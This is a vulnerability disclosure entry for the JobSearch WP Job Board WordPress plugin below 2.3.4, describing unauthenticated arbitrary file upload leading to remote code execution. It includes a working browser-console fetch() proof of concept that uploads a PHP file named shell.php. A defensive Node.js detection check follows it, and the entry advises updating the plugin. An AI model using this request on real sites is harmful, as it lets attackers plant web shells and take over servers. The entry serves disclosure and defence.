Type: wpexploit
Author: Furkan Gedik
ID: WPEX-ID:757412F4-E4F8-4007-8E3B-639A72B33180
History: Feb 02, 2024 - 12:00 a.m.

JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE

2024-02-02 00:00:00
Furkan Gedik
arbitrary file upload
remote code execution
security vulnerability
website exploit
form data manipulation

AI Score: 7.2
Confidence: High
EPSS: 0
Percentile: 9.0%

Description

The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files, such as PHP files, to the server.

Navigate to the site, and paste the following in your browser's console:

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'jobsearch_facebook_get_soc_login_url',
        'user_data': JSON.stringify({
            "given_name": (Math.random()*0x1000).toFixed(),
            "family_name": (Math.random()*0x1000).toFixed(),
            "picture": "data:,<?php phpinfo(); //shell.php",
            "name": (Math.random()*0x1000).toFixed(),
            "email": (Math.random()*0x1000).toFixed(),
            "id": (Math.random()*0x1000).toFixed(),
        })
    })
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Notice a new file named "shell.php" was uploaded to the site.
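
A defender's view of the request above, as an added example (not code from WPScan, the plugin, or the author): a Node.js check that a reverse proxy or log pipeline with access to POST bodies could run to flag this action when its "picture" field is not a plausible avatar. The function names, the rule that "picture" must be an https URL or a base64 image data: URI, and the sample bodies are assumptions made for this example.

```javascript
// Added example (assumed helper names; sample bodies below are constructed).
const IMAGE_MAGIC = new Map([               // leading bytes of allowed image types
  ['image/png', [0x89, 0x50, 0x4e, 0x47]],
  ['image/jpeg', [0xff, 0xd8, 0xff]],
  ['image/gif', [0x47, 0x49, 0x46, 0x38]],
]);

// Returns null when `picture` looks like a real avatar, else a reason string.
function checkPicture(picture) {
  if (typeof picture !== 'string') return 'picture is not a string';
  if (/^https:\/\//i.test(picture)) return null; // assumption: providers send https URLs
  const m = /^data:([^;,]*)(;base64)?,(.*)$/is.exec(picture);
  if (!m) return 'picture is neither an https URL nor a parsable data: URI';
  const [, mime, isBase64, payload] = m;
  const magic = IMAGE_MAGIC.get(mime.toLowerCase());
  if (!magic) return `data: URI with non-image media type "${mime}"`;
  if (!isBase64) return 'image data: URI is not base64-encoded';
  const bytes = Buffer.from(payload, 'base64');
  return magic.every((b, i) => bytes[i] === b)
    ? null
    : 'payload does not start with the declared image signature';
}

// Inspects a raw application/x-www-form-urlencoded body sent to admin-ajax.php.
function inspectAjaxBody(rawBody) {
  const params = new URLSearchParams(rawBody);
  if (params.get('action') !== 'jobsearch_facebook_get_soc_login_url') {
    return { flagged: false, reason: null };
  }
  let userData;
  try {
    userData = JSON.parse(params.get('user_data') ?? '');
  } catch {
    return { flagged: true, reason: 'user_data is not valid JSON' };
  }
  if (userData === null || typeof userData !== 'object' || !('picture' in userData)) {
    return { flagged: false, reason: null };
  }
  const reason = checkPicture(userData.picture);
  return { flagged: reason !== null, reason };
}

// Constructed sample bodies: same shape as the request on this page.
const sampleBody = (picture) => new URLSearchParams({
  action: 'jobsearch_facebook_get_soc_login_url',
  user_data: JSON.stringify({ name: 'test', picture }),
}).toString();
console.log(inspectAjaxBody(sampleBody('data:,<?php phpinfo(); //shell.php')));
console.log(inspectAjaxBody(sampleBody('data:image/png;base64,iVBORw0KGgo=')));
```

This flags only the request shape shown on this page. The title lists versions below 2.3.4 as affected, so updating the plugin remains the fix.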
